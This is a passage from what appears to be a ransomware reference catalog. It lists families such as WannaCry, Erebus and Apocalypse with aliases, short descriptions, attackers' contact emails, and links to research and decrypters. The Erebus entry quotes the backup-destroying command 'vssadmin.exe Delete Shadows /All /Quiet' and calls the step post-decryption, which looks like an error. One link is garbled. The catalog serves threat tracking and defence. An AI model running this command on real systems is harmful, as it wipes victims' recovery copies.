<h3 id="_enigma_2_ransomware"><a class="anchor" href="#_enigma_2_ransomware"></a><a class="link" href="#_enigma_2_ransomware">Enigma 2 Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1887. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/enigma-2-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/enigma-2-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_deadly_ransomware"><a class="anchor" href="#_deadly_ransomware"></a><a class="link" href="#_deadly_ransomware">Deadly Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. sample is set to encrypt only in 2017&#8230;&#8203;</p>
</div>
<div class="paragraph">
<p>Deadly Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Deadly for a Good Purpose Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1888. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/deadly-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/deadly-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/785533373007728640">https://twitter.com/malwrhunterteam/status/785533373007728640</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_comrade_circle_ransomware"><a class="anchor" href="#_comrade_circle_ransomware"></a><a class="link" href="#_comrade_circle_ransomware">Comrade Circle Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1889. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/comrade-circle-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/comrade-circle-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_globe2_ransomware"><a class="anchor" href="#_globe2_ransomware"></a><a class="link" href="#_globe2_ransomware">Globe2 Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Globe2 Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Purge Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1890. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/globe2-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/globe2-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221">https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kostya_ransomware"><a class="anchor" href="#_kostya_ransomware"></a><a class="link" href="#_kostya_ransomware">Kostya Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1891. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/kostya-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/kostya-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/">http://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fs0ciety_locker_ransomware"><a class="anchor" href="#_fs0ciety_locker_ransomware"></a><a class="link" href="#_fs0ciety_locker_ransomware">Fs0ciety Locker Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1892. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/fs0ciety-locker-ransomware.htm">https://id-ransomware.blogspot.co.il/2016/10/fs0ciety-locker-ransomware.htm</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_erebus_ransomware"><a class="anchor" href="#_erebus_ransomware"></a><a class="link" href="#_erebus_ransomware">Erebus Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. After the files are decrypted, the shadow files are deleted using the following command: vssadmin.exe Delete Shadows /All /Quiet</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1893. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/09/erebus-ransomware.html">https://id-ransomware.blogspot.co.il/2016/09/erebus-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wannacry"><a class="anchor" href="#_wannacry"></a><a class="link" href="#_wannacry">WannaCry</a></h3>
<div class="paragraph">
<p>According to numerous open-source reports, a widespread ransomware campaign is affecting various organizations with reports of tens of thousands of infections in as many as 74 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France, and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry, or Wanna Decryptor, was discovered the morning of May 12, 2017, by an independent security researcher and has spread rapidly over several hours, with initial reports beginning around 4:00 AM EDT, May 12, 2017. Open-source reporting indicates a requested ransom of .1781 bitcoins, roughly $300 U.S.</p>
</div>
<div class="paragraph">
<p>WannaCry is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>WannaCrypt</p>
</li>
<li>
<p>WannaCry</p>
</li>
<li>
<p>WanaCrypt0r</p>
</li>
<li>
<p>WCrypt</p>
</li>
<li>
<p>WCRY</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1894. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168">https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptohasyou"><a class="anchor" href="#_cryptohasyou"></a><a class="link" href="#_cryptohasyou">.CryptoHasYou.</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1895. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/CryptoHasYou.html">http://www.nyxbone.com/malware/CryptoHasYou.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_777"><a class="anchor" href="#_777"></a><a class="link" href="#_777">777</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>777 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sevleg</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1896. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/777">https://decrypter.emsisoft.com/777</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_7ev3n"><a class="anchor" href="#_7ev3n"></a><a class="link" href="#_7ev3n">7ev3n</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>7ev3n is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>7ev3n-HONE$T</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1897. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/hasherezade/malware_analysis/tree/master/7ev3n">https://github.com/hasherezade/malware_analysis/tree/master/7ev3n</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.youtube.com/watch?v=RDNbH5HDO1E&amp;feature=youtu.be">https://www.youtube.com/watch?v=RDNbH5HDO1E&amp;feature=youtu.be</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/7ev3n-HONE$T.html">http://www.nyxbone.com/malware/7ev3n-HONE$T.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_8lock8"><a class="anchor" href="#_8lock8"></a><a class="link" href="#_8lock8">8lock8</a></h3>
<div class="paragraph">
<p>Ransomware Based on HiddenTear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1898. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/614025/8lock8-help-support-topic-8lock8-read-ittxt/">http://www.bleepingcomputer.com/forums/t/614025/8lock8-help-support-topic-8lock8-read-ittxt/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_airacrop"><a class="anchor" href="#_airacrop"></a><a class="link" href="#_airacrop">AiraCrop</a></h3>
<div class="paragraph">
<p>Ransomware related to TeamXRat</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1899. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/PolarToffee/status/796079699478900736">https://twitter.com/PolarToffee/status/796079699478900736</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_al_namrood"><a class="anchor" href="#_al_namrood"></a><a class="link" href="#_al_namrood">Al-Namrood</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1900. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/al-namrood">https://decrypter.emsisoft.com/al-namrood</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_alfa_ransomware"><a class="anchor" href="#_alfa_ransomware"></a><a class="link" href="#_alfa_ransomware">ALFA Ransomware</a></h3>
<div class="paragraph">
<p>Ransomware Made by creators of Cerber</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1901. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/new-alfa-or-alpha-ransomware-from-the-same-devs-as-cerber/">http://www.bleepingcomputer.com/news/security/new-alfa-or-alpha-ransomware-from-the-same-devs-as-cerber/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_alma_ransomware"><a class="anchor" href="#_alma_ransomware"></a><a class="link" href="#_alma_ransomware">Alma Ransomware</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1902. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://cta-service-cms2.hubspot.com/ctas/v2/public/cs/c/?cta_guid=d4173312-989b-4721-ad00-8308fff353b3&amp;placement_guid=22f2fe97-c748-4d6a-9e1e-ba3fb1060abe&amp;portal_id=326665&amp;redirect_url=APefjpGnqFjmP_xzeUZ1Y55ovglY1y1ch7CgMDLit5GTHcW9N0ztpnIE-ZReqqv8MDj687_4Joou7Cd2rSx8-De8uhFQAD_Len9QpT7Xvu8neW5drkdtTPV7hAaou0osAi2O61dizFXibewmpO60UUCd5OazCGz1V6yT_3UFMgL0x9S1VeOvoL_ucuER8g2H3f1EfbtYBw5QFWeUmrjk-9dGzOGspyn303k9XagBtF3SSX4YWSyuEs03Vq7Fxb04KkyKc4GJx-igK98Qta8iMafUam8ikg8XKPkob0FK6Pe-wRZ0QVWIIkM&amp;hsutk=34612af1cd87864cf7162095872571d1&amp;utm_referrer=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&amp;canon=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&amp" class="bare">https://cta-service-cms2.hubspot.com/ctas/v2/public/cs/c/?cta_guid=d4173312-989b-4721-ad00-8308fff353b3&amp;placement_guid=22f2fe97-c748-4d6a-9e1e-ba3fb1060abe&amp;portal_id=326665&amp;redirect_url=APefjpGnqFjmP_xzeUZ1Y55ovglY1y1ch7CgMDLit5GTHcW9N0ztpnIE-ZReqqv8MDj687_4Joou7Cd2rSx8-De8uhFQAD_Len9QpT7Xvu8neW5drkdtTPV7hAaou0osAi2O61dizFXibewmpO60UUCd5OazCGz1V6yT_3UFMgL0x9S1VeOvoL_ucuER8g2H3f1EfbtYBw5QFWeUmrjk-9dGzOGspyn303k9XagBtF3SSX4YWSyuEs03Vq7Fxb04KkyKc4GJx-igK98Qta8iMafUam8ikg8XKPkob0FK6Pe-wRZ0QVWIIkM&amp;hsutk=34612af1cd87864cf7162095872571d1&amp;utm_referrer=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&amp;canon=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&amp</a>;<em>hstc=61627571.34612af1cd87864cf7162095872571d1.1472135921345.1472140656779.1472593507113.3&amp;</em>hssc=61627571.1.1472593507113&amp;<em>hsfp=1114323283[<a href="https://cta-service-cms2.hubspot.com/ctas/v2/public/cs/c/?cta_guid=d4173312-989b-4721-ad00-8308fff353b3&amp;placement_guid=22f2fe97-c748-4d6a-9e1e-ba3fb1060abe&amp;portal_id=326665&amp;redirect_url=APefjpGnqFjmP_xzeUZ1Y55ovglY1y1ch7CgMDLit5GTHcW9N0ztpnIE-ZReqqv8MDj687_4Joou7Cd2rSx8-De8uhFQAD_Len9QpT7Xvu8neW5drkdtTPV7hAaou0osAi2O61dizFXibewmpO60UUCd5OazCGz1V6yT_3UFMgL0x9S1VeOvoL_ucuER8g2H3f1EfbtYBw5QFWeUmrjk-9dGzOGspyn303k9XagBtF3SSX4YWSyuEs03Vq7Fxb04KkyKc4GJx-igK98Qta8iMafUam8ikg8XKPkob0FK6Pe-wRZ0QVWIIkM&amp;hsutk=34612af1cd87864cf7162095872571d1&amp;utm_referrer=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&amp;canon=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&amp" class="bare">https://cta-service-cms2.hubspot.com/ctas/v2/public/cs/c/?cta_guid=d4173312-989b-4721-ad00-8308fff353b3&amp;placement_guid=22f2fe97-c748-4d6a-9e1e-ba3fb1060abe&amp;portal_id=326665&amp;redirect_url=APefjpGnqFjmP_xzeUZ1Y55ovglY1y1ch7CgMDLit5GTHcW9N0ztpnIE-ZReqqv8MDj687_4Joou7Cd2rSx8-De8uhFQAD_Len9QpT7Xvu8neW5drkdtTPV7hAaou0osAi2O61dizFXibewmpO60UUCd5OazCGz1V6yT_3UFMgL0x9S1VeOvoL_ucuER8g2H3f1EfbtYBw5QFWeUmrjk-9dGzOGspyn303k9XagBtF3SSX4YWSyuEs03Vq7Fxb04KkyKc4GJx-igK98Qta8iMafUam8ikg8XKPkob0FK6Pe-wRZ0QVWIIkM&amp;hsutk=34612af1cd87864cf7162095872571d1&amp;utm_referrer=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&amp;canon=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&amp</a>;</em>hstc=61627571.34612af1cd87864cf7162095872571d1.1472135921345.1472140656779.1472593507113.3&amp;<em>hssc=61627571.1.1472593507113&amp;</em>hsfp=1114323283]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://info.phishlabs.com/blog/alma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter">https://info.phishlabs.com/blog/alma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/new-alma-locker-ransomware-being-distributed-via-the-rig-exploit-kit/">http://www.bleepingcomputer.com/news/security/new-alma-locker-ransomware-being-distributed-via-the-rig-exploit-kit/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_alpha_ransomware"><a class="anchor" href="#_alpha_ransomware"></a><a class="link" href="#_alpha_ransomware">Alpha Ransomware</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>Alpha Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>AlphaLocker</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1903. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.bleepingcomputer.com/demonslay335/AlphaDecrypter.zip">http://download.bleepingcomputer.com/demonslay335/AlphaDecrypter.zip</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/decrypted-alpha-ransomware-continues-the-trend-of-accepting-amazon-cards/">http://www.bleepingcomputer.com/news/security/decrypted-alpha-ransomware-continues-the-trend-of-accepting-amazon-cards/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwarebread/status/804714048499621888">https://twitter.com/malwarebread/status/804714048499621888</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_amba"><a class="anchor" href="#_amba"></a><a class="link" href="#_amba">AMBA</a></h3>
<div class="paragraph">
<p>Ransomware Websites only <a href="mailto:amba@riseup.net">amba@riseup.net</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1904. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/benkow_/status/747813034006020096">https://twitter.com/benkow_/status/747813034006020096</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_angleware"><a class="anchor" href="#_angleware"></a><a class="link" href="#_angleware">AngleWare</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1905. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/844531418474708993">https://twitter.com/BleepinComputer/status/844531418474708993</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_anony"><a class="anchor" href="#_anony"></a><a class="link" href="#_anony">Anony</a></h3>
<div class="paragraph">
<p>Ransomware Based on HiddenTear</p>
</div>
<div class="paragraph">
<p>Anony is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ngocanh</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1906. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/842047409446387714">https://twitter.com/struppigel/status/842047409446387714</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apocalypse"><a class="anchor" href="#_apocalypse"></a><a class="link" href="#_apocalypse">Apocalypse</a></h3>
<div class="paragraph">
<p>Ransomware <a href="mailto:decryptionservice@mail.ru">decryptionservice@mail.ru</a> <a href="mailto:recoveryhelp@bk.ru">recoveryhelp@bk.ru</a> <a href="mailto:ransomware.attack@list.ru">ransomware.attack@list.ru</a> <a href="mailto:esmeraldaencryption@mail.ru">esmeraldaencryption@mail.ru</a> <a href="mailto:dr.compress@bk.ru">dr.compress@bk.ru</a></p>
</div>
<div class="paragraph">
<p>Apocalypse is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Fabiansomeware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1907. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/apocalypse">https://decrypter.emsisoft.com/apocalypse</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/">http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apocalypsevm"><a class="anchor" href="#_apocalypsevm"></a><a class="link" href="#_apocalypsevm">ApocalypseVM</a></h3>
<div class="paragraph">
<p>Ransomware Apocalypse ransomware version which uses VMprotect</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1908. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://decrypter.emsisoft.com/download/apocalypsevm">http://decrypter.emsisoft.com/download/apocalypsevm</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_autolocky"><a class="anchor" href="#_autolocky"></a><a class="link" href="#_autolocky">AutoLocky</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1909. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/autolocky">https://decrypter.emsisoft.com/autolocky</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aw3s0m3sc0t7"><a class="anchor" href="#_aw3s0m3sc0t7"></a><a class="link" href="#_aw3s0m3sc0t7">Aw3s0m3Sc0t7</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1910. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/828902907668000770">https://twitter.com/struppigel/status/828902907668000770</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_badblock"><a class="anchor" href="#_badblock"></a><a class="link" href="#_badblock">BadBlock</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1911. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/badblock">https://decrypter.emsisoft.com/badblock</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/BadBlock.html">http://www.nyxbone.com/malware/BadBlock.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/images/articulos/malware/badblock/5.png">http://www.nyxbone.com/images/articulos/malware/badblock/5.png</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_baksocrypt"><a class="anchor" href="#_baksocrypt"></a><a class="link" href="#_baksocrypt">BaksoCrypt</a></h3>
<div class="paragraph">
<p>Ransomware Based on my-Little-Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1912. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/760482299007922176">https://twitter.com/JakubKroustek/status/760482299007922176</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://0xc1r3ng.wordpress.com/2016/06/24/bakso-crypt-simple-ransomware/">https://0xc1r3ng.wordpress.com/2016/06/24/bakso-crypt-simple-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bandarchor"><a class="anchor" href="#_bandarchor"></a><a class="link" href="#_bandarchor">Bandarchor</a></h3>
<div class="paragraph">
<p>Ransomware Files might be partially encrypted</p>
</div>
<div class="paragraph">
